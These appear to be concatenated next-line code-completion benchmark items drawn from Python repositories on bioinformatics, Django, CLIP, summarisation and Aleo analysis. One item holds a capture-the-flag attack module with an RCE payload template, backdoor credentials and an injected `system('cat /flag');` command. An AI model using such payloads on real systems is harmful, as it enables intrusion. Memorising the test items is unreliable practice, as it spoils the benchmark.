adata.uns[uns_key].update(clustering_results)
return _estimate_covariances(adata, max_condition_number, pvd_pct,
copy, return_results,
top_genes=top_genes,
results_clustering=clustering_results,
uns_key=uns_key)
def _estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False, coexpression_filename=None,
top_genes=None, results_clustering=None,
uns_key=None, cluster_covar_key=None,
cluster_var_ct_key=None):
if uns_key is None:
uns_key = UNS_KEY
if cluster_covar_key is None:
cluster_covar_key = CLUSTER_COVAR_KEY
if cluster_var_ct_key is None:
cluster_var_ct_key = CLUSTER_VAR_CT_KEY
if copy:
adata = adata.copy()
# change later
top_genes = top_genes
results_clustering = results_clustering
cell2cluster = results_clustering["cell2cluster"]
filtered_data = adata[:,top_genes]
# Get the clusters from the reduced data.
clusters = {}
processed_data = None
if scipy.sparse.issparse(filtered_data.X):
processed_data = filtered_data.X.A
else:
processed_data = filtered_data.X
for key in cell2cluster.keys():
cluster_indices = cell2cluster[key]
clusters[key] = processed_data[cluster_indices,:]
cluster_covariances = {}
cluster_var_count = {}
for i,cluster in clusters.items():
| cluster_covar, var_count = compute_covariance_and_ncomps_pct_variance(cluster, max_condition_number, pvd_pct) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: dacx/fcd-community
# Path: fcd_community/users/forms.py
class UserAdminChangeForm(admin_forms.UserChangeForm):
class Meta(admin_forms.UserChangeForm.Meta):
model = User
field_classes = {"email": EmailField}
# Path: fcd_community/users/models.py
class User(AbstractUser):
"""
Default custom user model for Full Cycle Dev Community Product.
If adding fields that need to be filled at user signup,
check forms.SignupForm and forms.SocialSignupForms accordingly.
"""
# First and last name do not cover name patterns around the globe
name = CharField(_("Name of User"), blank=True, max_length=255)
first_name = None # type: ignore
last_name = None # type: ignore
email = EmailField(_("email address"), unique=True)
username = None # type: ignore
stripe_customer_id = CharField(max_length=255, blank=True, null=True)
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
objects = UserManager()
def get_absolute_url(self) -> str:
"""Get URL for user's detail view.
Returns:
str: URL for user detail.
"""
return reverse("users:detail", kwargs={"pk": self.id})
# Path: fcd_community/users/tests/factories.py
class UserFactory(DjangoModelFactory):
email = Faker("email")
name = Faker("name")
@post_generation
def password(self, create: bool, extracted: Sequence[Any], **kwargs):
password = (
extracted
if extracted
else Faker(
"password",
length=42,
special_chars=True,
digits=True,
upper_case=True,
lower_case=True,
).evaluate(None, None, extra={"locale": None})
)
self.set_password(password)
@classmethod
def _after_postgeneration(cls, instance, create, results=None):
"""Save again the instance if creating and at least one hook ran."""
if create and results and not cls._meta.skip_postgeneration_save:
# Some post-generation hooks ran, and may have modified us.
instance.save()
class Meta:
model = get_user_model()
django_get_or_create = ["email"]
# Path: fcd_community/users/views.py
class UserDetailView(LoginRequiredMixin, DetailView):
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
class UserRedirectView(LoginRequiredMixin, RedirectView):
def get_success_url(self):
def get_object(self):
def get_redirect_url(self):
# Path: fcd_community/users/tests/test_views.py
import pytest
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.http import HttpRequest, HttpResponseRedirect
from django.test import RequestFactory
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from fcd_community.users.forms import UserAdminChangeForm
from fcd_community.users.models import User
from fcd_community.users.tests.factories import UserFactory
from fcd_community.users.views import (
UserRedirectView,
UserUpdateView,
user_detail_view,
)
pytestmark = pytest.mark.django_db
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory):
| view = UserUpdateView() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: fepegar/jvol
# Path: src/jvol/io.py
def open_jvol(path: Path) -> Tuple[np.ndarray, np.ndarray]:
loaded = np.load(path)
ijk_to_ras = fill_ijk_to_ras(loaded[FormatKeys.IJK_TO_RAS.value])
quantization_block = loaded[FormatKeys.QUANTIZATION_BLOCK.value]
array = decode_array(
dc_rle_values=loaded[FormatKeys.DC_RLE_VALUES],
dc_rle_counts=loaded[FormatKeys.DC_RLE_COUNTS],
ac_rle_values=loaded[FormatKeys.AC_RLE_VALUES],
ac_rle_counts=loaded[FormatKeys.AC_RLE_COUNTS],
quantization_block=quantization_block,
target_shape=loaded[FormatKeys.SHAPE],
intercept=loaded[FormatKeys.INTERCEPT],
slope=loaded[FormatKeys.SLOPE],
dtype=loaded[FormatKeys.DTYPE].dtype,
)
return array, ijk_to_ras
# Path: src/jvol/io.py
def save_jvol(
array: np.ndarray,
ijk_to_ras: np.ndarray,
path: Path,
block_size: int = 4,
quality: int = 60,
) -> None:
block_shape = block_size, block_size, block_size
quantization_table = get_quantization_table(block_shape, quality)
dtype = array.dtype
intercept = array.min()
slope = array.max() - intercept
dc_rle_values, dc_rle_counts, ac_rle_values, ac_rle_counts = encode_array(
array,
quantization_table,
)
dc_rle_values = dc_rle_values.astype(np.min_scalar_type(dc_rle_values))
dc_rle_counts = dc_rle_counts.astype(np.min_scalar_type(dc_rle_counts))
ac_rle_values = ac_rle_values.astype(np.min_scalar_type(ac_rle_values))
ac_rle_counts = ac_rle_counts.astype(np.min_scalar_type(ac_rle_counts))
save_dict = {
FormatKeys.IJK_TO_RAS.value: ijk_to_ras[:3],
FormatKeys.QUANTIZATION_BLOCK.value: quantization_table,
FormatKeys.DC_RLE_VALUES.value: dc_rle_values,
FormatKeys.DC_RLE_COUNTS.value: dc_rle_counts,
FormatKeys.AC_RLE_VALUES.value: ac_rle_values,
FormatKeys.AC_RLE_COUNTS.value: ac_rle_counts,
FormatKeys.DTYPE.value: np.empty((), dtype=dtype),
FormatKeys.INTERCEPT.value: intercept,
FormatKeys.SLOPE.value: slope,
FormatKeys.SHAPE.value: np.array(array.shape, dtype=np.uint16),
}
with open(path, "wb") as f:
np.savez_compressed(f, **save_dict)
# Path: src/jvol/jvol.py
import os
import numpy as np
import numpy.typing as npt
from pathlib import Path
from typing import Any
from typing import TypeAlias
from typing import Union
from .io import open_jvol
from .io import save_jvol
from __future__ import annotations
TypePath: TypeAlias = Union[str, os.PathLike]
class JpegVolume:
"""Base class for saving and loading JPEG-encoded volumes.
Args:
array: 3D NumPy array.
ijk_to_ras: 4×4 affine transformation matrix containing the mapping
from voxel indices to RAS+ (left → right, posterior → anterior,
inferior → superior) coordinates. If not specified, the identity
matrix is used.
Tip:
To learn more about coordinates systems, check the following resources:
- [NiBabel](https://nipy.org/nibabel/)'s [Coordinate systems and affines](https://nipy.org/nibabel/coordinate_systems.html),
- [3D Slicer](https://www.slicer.org/)'s [Coordinate systems](https://slicer.readthedocs.io/en/latest/user_guide/coordinate_systems.html),
- [FSL](https://fsl.fmrib.ox.ac.uk/)'s [docs (see "Background information on NIfTI Orientation")](https://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Orientation%20Explained)
""" # noqa: E501
def __init__(
self,
array: npt.ArrayLike,
ijk_to_ras: npt.ArrayLike | None = None,
):
self.array = np.array(array)
if ijk_to_ras is None:
ijk_to_ras = np.eye(4)
self.ijk_to_ras = np.array(ijk_to_ras, dtype=np.float64)
if self.array.ndim != 3:
raise ValueError(
f"Array must have 3 dimensions, got shape {self.array.shape}"
)
if self.ijk_to_ras.shape != (4, 4):
raise ValueError(
f"ijk_to_ras must have shape (4, 4), got {self.ijk_to_ras.shape}"
)
assert self.ijk_to_ras.shape == (4, 4)
@classmethod
def open(cls, path: TypePath) -> JpegVolume:
"""Open a JVol file.
Args:
path: Path to a file with `'.jvol'` extension.
"""
path = Path(path)
if not path.is_file():
raise FileNotFoundError(f'File not found: "{path}"')
if path.suffix != ".jvol":
raise ValueError(f'File must have .jvol extension, got "{path}"')
| return cls(*open_jvol(path)) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: iramluism/basel
# Path: basel/components/components.py
class Component(metaclass=abc.ABCMeta):
def __init__(
self,
name: str,
nodes: List[Node] = None,
instability: Optional[float] = 1,
abstraction: Optional[float] = 1,
error: Optional[float] = 1,
) -> None:
self.name = name
self.nodes = {}
self.instability = instability
self.abstraction = abstraction
self.error = error
for node in nodes or []:
self.add_node(node)
def set_error(self, error):
self.error = error
def set_instability(self, instability):
self.instability = instability
def set_abstraction(self, abstraction):
self.abstraction = abstraction
def get_classes(self):
classes = []
nodes = list(self.nodes.values())
while nodes:
node = nodes.pop(0)
if not node:
break
children = node.get_children()
nodes.extend(children)
if isinstance(node, ClassNode):
classes.append(node)
return classes
def __repr__(self):
return f"<{self.__class__.__name__}:{self.name}>"
def has_node(self, node_name):
return node_name in self.nodes
def add_node(self, node: Node):
self.nodes[node.name] = node
def get_node(self, node_name):
return self.nodes.get(node_name)
def __iter__(self):
for node in self.nodes.values():
yield node
def __eq__(self, component):
if not component:
return False
equal_names = self.name == component.name
for other_node in component:
self_node = self.get_node(other_node.name)
if other_node != self_node:
return False
return equal_names
def __ne__(self, component):
return not self.__eq__(component)
# Path: basel/components/classes.py
class ClassNode(Node):
def __init__(
self,
name: str,
subclasses: Optional[List] = None,
keywords: Optional[Dict] = None,
**kwargs,
):
super().__init__(name, **kwargs)
self.subclasses = subclasses or []
self.keywords = keywords or {}
def __eq__(self, other_node):
if not other_node:
return False
match_names = other_node.name == self.name
match_subclasses = other_node.subclasses == self.subclasses
match_keywords = other_node.keywords == self.keywords
match_children = self.has_children(other_node)
return match_names and match_children and match_keywords and match_subclasses
# Path: basel/components/modules.py
class ModuleNode(Node):
pass
# Path: tests/unit_tests/components/component_test.py
from basel.components import Component
from basel.components.classes import ClassNode
from basel.components.modules import ModuleNode
import pytest
@pytest.mark.parametrize(
"component,expected_classes",
[
(
Component(
name="Componant_A",
nodes=[
| ModuleNode( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Gr-1m/AWD-Frame-ByGr1m
# Path: Configs/frame_config.py
FRAME_DIR = _os.path.dirname(_os.path.dirname(__file__))
# Path: Configs/config.py
API_URL = 'http://kaming/awduse/submit.php'
# Path: func/CmdColors.py
def printX(context=None, *args, logtime=True, **kwargs) -> None:
try:
if context[0] == '[' and context[2] == ']':
prompt = context[1].lower()
main_text = context[3:].lstrip()
if prompt == '0':
context = '\x1b[01;30;30m[0]\x1b[0m ' + main_text
elif prompt == '-':
context = '\x1b[01;30;31m[-]\x1b[0m ' + main_text
elif prompt.lower() == 'i':
logtime = logtime or False
context = '\x1b[01;30;32m[i]\x1b[0m ' + main_text
elif prompt.lower() == 'w' or prompt.lower() == '!':
logtime = logtime or False
context = '\x1b[01;30;33m[W]\x1b[0m ' + main_text
elif prompt == '+':
context = '\x1b[01;30;34m[+]\x1b[0m ' + main_text
elif prompt == '*':
context = '\x1b[01;30;35m[*]\x1b[0m ' + main_text
elif prompt.upper() == 'F':
context = '\x1b[01;30;36m[F]\x1b[0m ' + main_text
else:
logtime = logtime or False
context = '\x1b[01;30;37m[!]\x1b[0m ' + main_text
elif context:
context = '\x1b[01;30;38m[?]\x1b[0m ' + context.lstrip()
else:
pass
except IndexError:
context = '\x1b[01;30;37m[E]\x1b[0m ' + f"Log Input Error:{context.lstrip()}"
else:
pass
finally:
if logtime:
context = f"[\x1b[01;30;32m{time.asctime().split()[3]}\x1b[0m] " + context
print(f"{context}", *args, **kwargs)
return None
# Path: modules/Attack.py
from Configs.frame_config import FRAME_DIR
from Configs.config import FlagRegular
from func.CmdColors import printX
from modules.ReplaceStr import *
from urllib.parse import urlparse as URL
import requests, pymysql, paramiko, socket
import hashlib, base64
import os as _os
import re
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@project : customGr1m
@file : Attack.py
@Author : Gr%1m
@Date : 14/11/2023 10:56 am
"""
# from pwn import *
# About Flag
Flags = set()
FlagPath = '/flag'
FlagLen = 41
# Payload INFO
Payloads = {
f"http://POST@{HostReplaceStr}:80/awdtest/testback.php?submit=submit&bb={RceReplaceStr}",
}
WebRootDir = '/var/www/html'
LoginCookie = 'security=low; PHPSESSID=e16f5c982733368120234560b9cb5625'
BDFileName = 'a10uN7yA_1'
BDcmdPass = 'x2aom1ng_20231114'
BDRceParam = 'kAt3l1na'
MemShell = set()
# todo: attack
# Enemy INFO
X = 'x'
def _up_payloads(data):
Payloads.add(data)
def submit_flag(submitAPI, token, flag):
try:
if submitAPI[-1] == 'GET':
url = f'{submitAPI[0]}?{submitAPI[1]}={token}&{submitAPI[2]}={flag}'
res = requests.get(url=url)
elif submitAPI[-1] == 'POST':
res = requests.post(url=submitAPI[0], data={submitAPI[1]: token, submitAPI[2]: flag})
else:
printX("[!] please set SubmitAPI method")
return "No", 400
return res.text, res.status_code
except KeyboardInterrupt:
printX('[-] Interrupt Submit Flag')
return 0, 0
except Exception:
return 0, 0
def _attack_vul(hostname, payload, cmd):
purl = URL(payload)
method, payload = purl.username, payload.split(f'@{HostReplaceStr}')[-1]
payload = payload.replace(RceReplaceStr, cmd)
url = f'http://{hostname}{payload}'
try:
if method == 'GET':
res = requests.get(url=url, headers={'Cookie': LoginCookie})
elif method == 'POST':
params = payload.split('?', maxsplit=1)[-1]
data = {_.split('=', maxsplit=1)[0]: _.split('=', maxsplit=1)[1] for _ in params.split('&')}
res = requests.post(url, data=data, headers={'Cookie': LoginCookie})
else:
printX(f'[-] Not Allow Method in payload {payload}')
raise NameError
except:
class _X:
def __init__(self):
self.text = None
self.status_code = 400
res = _X()
return res, purl
def get_flag(ey_hosts, rce="system('cat /flag');"):
def extract_flag(text):
try:
| flag = re.search(FlagRegular, text).group() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Wolfsauge/async_summarize
# Path: sync_helpers.py
def get_length_of_chunk_in_tokens(my_chunk: str, buck_slip: dict) -> int:
my_result = buck_slip["tokenizer"](my_chunk)
input_ids = my_result.input_ids
length_of_chunk_in_tokens = len(input_ids)
return length_of_chunk_in_tokens
# Path: sync_helpers.py
def get_text_splitter(
buck_slip: dict, custom_chunk_size: int, custom_chunk_overlap: int
) -> TextSplitter:
batched_tokenization = buck_slip["use_batched_tokenization"]
if batched_tokenization is True:
text_splitter = RecursiveCharacterTextSplitter.from_huggingface_tokenizer(
tokenizer=buck_slip["tokenizer"],
chunk_size=custom_chunk_size,
chunk_overlap=custom_chunk_overlap,
)
else:
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=custom_chunk_size,
chunk_overlap=custom_chunk_overlap,
length_function=lambda x: get_length_of_chunk_in_tokens(x, buck_slip),
)
return text_splitter
# Path: sync_helpers.py
def grouped(iterable: Iterable[T], number_of_elements=2) -> Iterable[Tuple[T, ...]]:
"""https://stackoverflow.com/a/5389547"""
return zip(*[iter(iterable)] * number_of_elements)
# Path: sync_helpers.py
def find_chunk_pair_with_minimal_size(elements) -> tuple[int, int]:
last_index = len(elements) - 1
min_length = len(elements[0])
min_index = 0
for i, result in enumerate(elements):
if i < last_index:
sum_of_chars = len(result) + len(elements[i + 1])
if sum_of_chars < min_length:
min_length = sum_of_chars
min_index = i
return min_index, min_index + 1
# Path: sync_helpers.py
def find_longest_element_index(elements) -> int:
max_length = 0
max_index = 0
for i, result in enumerate(elements):
if len(result) > max_length:
max_length = len(result)
max_index = i
return max_index
# Path: sync_helpers.py
def calc_custom_chunking_parameters(
length_of_chunk_in_tokens: int, buck_slip: dict
) -> tuple[int, int]:
my_divisor = math.ceil(length_of_chunk_in_tokens / buck_slip["chunk_size"])
my_divisor = power_log(my_divisor)
my_custom_chunk_size = math.ceil(length_of_chunk_in_tokens / my_divisor)
my_custom_chunk_size = math.ceil(my_custom_chunk_size * 1.10)
my_custom_chunk_overlap = math.ceil(my_custom_chunk_size * 0.1)
return my_custom_chunk_size, my_custom_chunk_overlap
# Path: async_helpers.py
import sys
import asyncio
import math
from tqdm.asyncio import tqdm # type: ignore
from icecream import ic # type: ignore
from sync_helpers import (
get_length_of_chunk_in_tokens,
get_text_splitter,
grouped,
find_chunk_pair_with_minimal_size,
find_longest_element_index,
calc_custom_chunking_parameters,
)
async def get_completion(buck_slip: dict, task: str, **kwargs) -> str:
template = buck_slip["jinja2_env"].from_string(buck_slip["prompt_templates"][task])
if task == "summarize":
chunk = kwargs["chunk"]
if isinstance(chunk, str):
my_prompt = template.render(prompt=chunk)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
elif task == "merge":
first_element = kwargs["first_element"]
second_element = kwargs["second_element"]
if isinstance(first_element, str) and isinstance(second_element, str):
my_prompt = template.render(
first_element=first_element, second_element=second_element
)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
bad_counter = 0
attempt_counter = 0
while attempt_counter <= buck_slip["max_completion_retries"]:
my_temperature = buck_slip["temperature"] + attempt_counter * 0.1
completion = await buck_slip["api_client"].completions.create(
model=buck_slip["model_local_identifier"],
prompt=my_prompt,
max_tokens=buck_slip["max_tokens"],
temperature=my_temperature,
)
attempt_counter += 1
finish_reason = completion.choices[0].finish_reason
if finish_reason == "stop":
break
bad_counter += 1
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: finish_reason != 'stop', retrying.")
if bad_counter >= buck_slip["max_completion_retries"]:
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: aborting after multiple failed attempts.")
sys.exit(1)
return completion.choices[0].text
async def do_chunking_step(my_chunk: str, buck_slip: dict) -> list:
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
chunks = buck_slip["text_splitter"].split_text(my_chunk)
tqdm.write(f"Released {lock}.")
return chunks
async def merge_elements(elements, buck_slip: dict, pindex: int) -> tuple[str, int]:
first_element, second_element = elements
intermediate_merge_result = await get_completion(
buck_slip, "merge", first_element=first_element, second_element=second_element
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def summarize_element(chunk, buck_slip: dict, pindex: int) -> tuple[str, int]:
intermediate_merge_result = await get_completion(
buck_slip, "summarize", chunk=chunk
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def split_further(partial_results: list, my_pos: int, buck_slip: dict) -> list:
ic("Split further.")
ic(my_pos)
ic(len(partial_results))
my_len_list = [len(_) for _ in partial_results]
ic(my_len_list)
my_chunk = partial_results[my_pos]
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
length_of_chunk_in_tokens = get_length_of_chunk_in_tokens(my_chunk, buck_slip)
tqdm.write(f"Released {lock}.")
my_custom_chunk_size = length_of_chunk_in_tokens
my_custom_chunk_overlap = 0
| buck_slip["text_splitter"] = get_text_splitter( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: balazsborsos/dae_postprocessing
# Path: utils/parser.py
class ConfigurationParser:
def __init__(self):
self.parser = argparse.ArgumentParser(description='Script for training or evaluation with configuration.')
# Argument to specify mode (train or evaluation)
self.parser.add_argument('mode', choices=['train', 'evaluation'], help='Mode: train or evaluation')
# Argument to specify the path to the configuration YAML file
self.parser.add_argument('-t', '--config', type=str, required=True, help='Path to the configuration file')
# Argument to specify the path to the data
self.parser.add_argument('-i', '--input', type=str, required=True, help='Path to the input data')
def parse_args(self):
return self.parser.parse_args()
# Path: utils/parser.py
def parse_yaml_config(file_path: Path) -> dict:
with open(file_path, 'r') as config_file:
config_data = yaml.load(config_file, Loader=yaml.FullLoader)
return config_data
# Path: train.py
def train_model(config: dict, data_path: Path):
model_dir = config["store_model_to"]
print('Model directory: ', model_dir)
# custom parameters set in yaml file
training_params = config["training_configuration"]
# callback and logger
callbacks = [
ModelCheckpoint( # saves weights for every n epochs
dirpath=Path(model_dir, "checkpoint"),
filename='weights.epoch{epoch:03}-val_denoise_dice_{val_denoise_dice:.4f}',
save_top_k=-1,
auto_insert_metric_name=False,
save_weights_only=False,
every_n_epochs=5,
)
]
loggers = [
TensorBoardLogger(
save_dir=model_dir,
name='board',
version=''
),
]
# model
model = get_model(**training_params)
# data
train_dataloader = get_dataloader(
data_path,
mlset="training",
**training_params
)
val_dataloader = get_dataloader(
data_path,
mlset="validation",
**training_params
)
# training
trainer = pl.Trainer(
logger=loggers,
callbacks=callbacks,
max_epochs=training_params["max_epochs"],
gpus=training_params.get("gpus", 1),
auto_select_gpus=True,
strategy=training_params.get("strategy", None),
gradient_clip_val=0.5,
log_every_n_steps=5
)
trainer.fit(
model,
train_dataloaders=train_dataloader,
val_dataloaders=val_dataloader,
)
# Path: main.py
from utils.parser import ConfigurationParser, parse_yaml_config
from train import train_model
if __name__ == "__main__":
config_parser = ConfigurationParser()
args = config_parser.parse_args()
| config = parse_yaml_config(args.config) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: htyao89/Textual-based_Class-aware_prompt_tuning
# Path: clip/model.py
def build_model(state_dict: dict):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith("transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers
)
for key in ["input_resolution", "context_length", "vocab_size"]:
if key in state_dict:
del state_dict[key]
convert_weights(model)
model.load_state_dict(state_dict)
return model.eval()
# Path: clip/simple_tokenizer.py
class SimpleTokenizer(object):
def __init__(self, bpe_path: str = default_bpe()):
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
merges = gzip.open(bpe_path).read().decode("utf-8").split('\n')
merges = merges[1:49152-256-2+1]
merges = [tuple(merge.split()) for merge in merges]
vocab = list(bytes_to_unicode().values())
vocab = vocab + [v+'</w>' for v in vocab]
for merge in merges:
vocab.append(''.join(merge))
vocab.extend(['<|startoftext|>', '<|endoftext|>'])
self.encoder = dict(zip(vocab, range(len(vocab))))
self.decoder = {v: k for k, v in self.encoder.items()}
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {'<|startoftext|>': '<|startoftext|>', '<|endoftext|>': '<|endoftext|>'}
self.pat = re.compile(r"""<\|startoftext\|>|<\|endoftext\|>|'s|'t|'re|'ve|'m|'ll|'d|[\p{L}]+|[\p{N}]|[^\s\p{L}\p{N}]+""", re.IGNORECASE)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token[:-1]) + ( token[-1] + '</w>',)
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key = lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
except:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
self.cache[token] = word
return word
def encode(self, text):
bpe_tokens = []
text = whitespace_clean(basic_clean(text)).lower()
for token in re.findall(self.pat, text):
token = ''.join(self.byte_encoder[b] for b in token.encode('utf-8'))
bpe_tokens.extend(self.encoder[bpe_token] for bpe_token in self.bpe(token).split(' '))
return bpe_tokens
def decode(self, tokens):
text = ''.join([self.decoder[token] for token in tokens])
text = bytearray([self.byte_decoder[c] for c in text]).decode('utf-8', errors="replace").replace('</w>', ' ')
return text
# Path: clip/clip.py
import hashlib
import os
import urllib
import warnings
import torch
from typing import Any, Union, List
from pkg_resources import packaging
from PIL import Image
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize
from tqdm import tqdm
from .model import build_model
from .simple_tokenizer import SimpleTokenizer as _Tokenizer
from torchvision.transforms import InterpolationMode
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
if packaging.version.parse(torch.__version__) < packaging.version.parse("1.7.1"):
warnings.warn("PyTorch version 1.7.1 or higher is recommended")
__all__ = ["available_models", "load", "tokenize"]
| _tokenizer = _Tokenizer() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Veridise/vanguard-aleo
# Path: vanguard/aleo/common.py
def get_ifg_edges(prog, func, hash=False, call=False, inline=False):
"""Get information flow graph edges.
Args:
- prog:
- func
- hash (default: False): whether to treat a hash function call directly as an edge
- call (default: False): whether to treat a call directly as an edge
- inline (default: False): whether to inline call invocations recursively to generate edges;
if `call` is True, this argument is then overridden and no inlining will take place.
Rets: A list of pairs of strings
"""
node = prog.functions[func]
assert_node_field(node, "instructions")
edges = []
# process instructions
for inst in node["instructions"] + node["outputs"]:
tokens = trim_inst(inst["str"]).split()
match tokens:
case ["is.eq", o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case ["is.neq", o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case ["assert.eq", o1, o2]:
edges.append((o1, o2))
edges.append((o2, o1))
case ["assert.neq", o1, o2]:
edges.append((o1, o2))
edges.append((o2, o1))
case ["cast", o, "into", r, "as", d]:
edges.append((o, r))
case ["call", *ts]:
# manualy match the call component since there are two sequences of varying lengths
idx_into = tokens.index("into")
f = tokens[1]
os = tokens[2:idx_into]
rs = tokens[idx_into+1:]
if call:
for o in os:
for r in rs:
# overapproximated edges from every o to every r
edges.append((o, r))
elif inline:
# TODO: add impl
raise NotImplementedError
else:
# no inline, no call, then no edge
pass
case ["async", *ts]:
# FIXME: can't find official documentation for now, treated as call
# manualy match the call component since there are two sequences of varying lengths
idx_into = tokens.index("into")
f = tokens[1]
os = tokens[2:idx_into]
rs = tokens[idx_into+1:]
if call:
for o in os:
for r in rs:
# overapproximated edges from every o to every r
edges.append((o, r))
elif inline:
# TODO: add impl
raise NotImplementedError
else:
# no inline, no call, then no edge
pass
case [cop, o1, o2, "into", r, "as", t] if cop.startswith("commit"):
# no edge in commitment computation
pass
case [hop, o1, "into", r, "as", t] if hop.startswith("hash"):
# no edge in hash computation
pass
case [binop, o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case [unop, o, "into", r]:
edges.append((o, r))
case [terop, o1, o2, o3, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
edges.append((o3, r))
case ["cast", *os, "into", dst, "as", typ]:
for o in os:
edges.append((o, dst))
case ["output", o, "as", typ]:
# no edge in output command
pass
case _:
raise NotImplementedError(f"Unknown instruction pattern, got: {inst['str']}")
return edges
# Path: vanguard/aleo/common.py
def trim_inst(inst: str):
# remove space in "; " in array literals
# remove tailing semi-colon ";"
return inst.replace("; ", ";").strip(";")
# Path: vanguard/aleo/detectors/infoleak.py
import networkx as nx
from ..common import get_ifg_edges, trim_inst
def detector_infoleak(prog, func):
"""Detect for information leak
Args:
- prog:
- func:
Rets: (result, info)
"""
| edges = get_ifg_edges(prog, func, hash=False, call=True, inline=False) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: winrey/x-following
# Path: client.py
class MyUser(TypedDict):
class TimelineUserEntitiesDescription(TypedDict):
class TimelineUserEntitiesURL(TypedDict):
class TimelineUserEntities(TypedDict):
class TimelineUserLegacy(TypedDict):
class TimelineUser(TypedDict):
class FollowingUser(TimelineUser, TimelineUserLegacy, TypedDict):
class TwitterClient:
